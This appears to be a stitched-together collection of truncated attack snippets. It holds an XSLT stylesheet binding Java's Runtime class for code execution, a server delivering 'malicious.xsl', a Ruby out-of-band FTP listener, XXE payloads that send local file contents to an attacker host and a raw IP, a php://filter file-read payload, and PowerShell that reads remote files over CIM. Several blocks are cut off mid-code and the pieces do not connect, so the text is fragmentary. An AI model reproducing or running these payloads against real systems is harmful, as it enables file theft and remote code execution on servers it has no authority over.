```xml
<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:date="http://xml.apache.org/xalan/java/java.util.Date"
    xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime"
    xmlns:str="http://xml.apache.org/xalan/java/java.lang.String"
    exclude-result-prefixes="date">
  <xsl:output method="text"/>
  <xsl:template match="/">
```
```python
from tornado.ioloop import IOLoop
import tornado.web
import time

class MainHandler(tornado.web.RequestHandler):
    def get(self):
        with open("malicious.xsl", "r") as file:
            self.write(file.read())
            self.flush()
```
```ruby
require 'socket'
ftp_server = TCPServer.new 443
log = File.open( "xxe-ftp.log", "a")
Thread.start do
  loop do
    Thread.start(ftp_server.accept) do |ftp_client|
      puts "FTP. New client connected"
```
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM
'gopher://attacker.xss.lol:2200/?%file;'>"> %all;
```
```xml
<!DOCTYPE foo [
<!ENTITY % file SYSTEM "file:///">
<!ENTITY % dtd SYSTEM "http://192.99.71.144:8888/remote_ftp.dtd">
%dtd;]>
<svg xmlns="http://www.w3.org/2000/svg" width="12cm" height="12cm">
  <text>Hello&send;</text>
</svg>
```
```xml
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=test_dev.php">
]>
<feed>
  <title>test</title>
  <description>test</description>
  <entry>
    <title>Hello</title>
    <link href="http://example.com"></link>
```
```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"encoding/hex"
	"fmt"
)
```
```powershell
$CimSession = New-CimSession -ComputerName 10.0.0.2
$FilePath = 'C:\Windows\System32\notepad.exe'
# PS_ModuleFile only implements GetInstance (versus EnumerateInstance) so this trick below will force a "Get" operation versus the default "Enumerate" operation.
$PSModuleFileClass = Get-CimClass -Namespace ROOT/Microsoft/Windows/Powershellv3 -ClassName PS_ModuleFile -CimSession $CimSession
$InMemoryModuleFileInstance = New-CimInstance -CimClass $PSModuleFileClass -Property @{ InstanceID= $FilePath } -ClientOnly
$FileContents = Get-CimInstance -InputObject $InMemoryModuleFileInstance -CimSession $CimSession
$FileLengthBytes = $FileContents.FileData[0..3]
[Array]::Reverse($FileLengthBytes)
```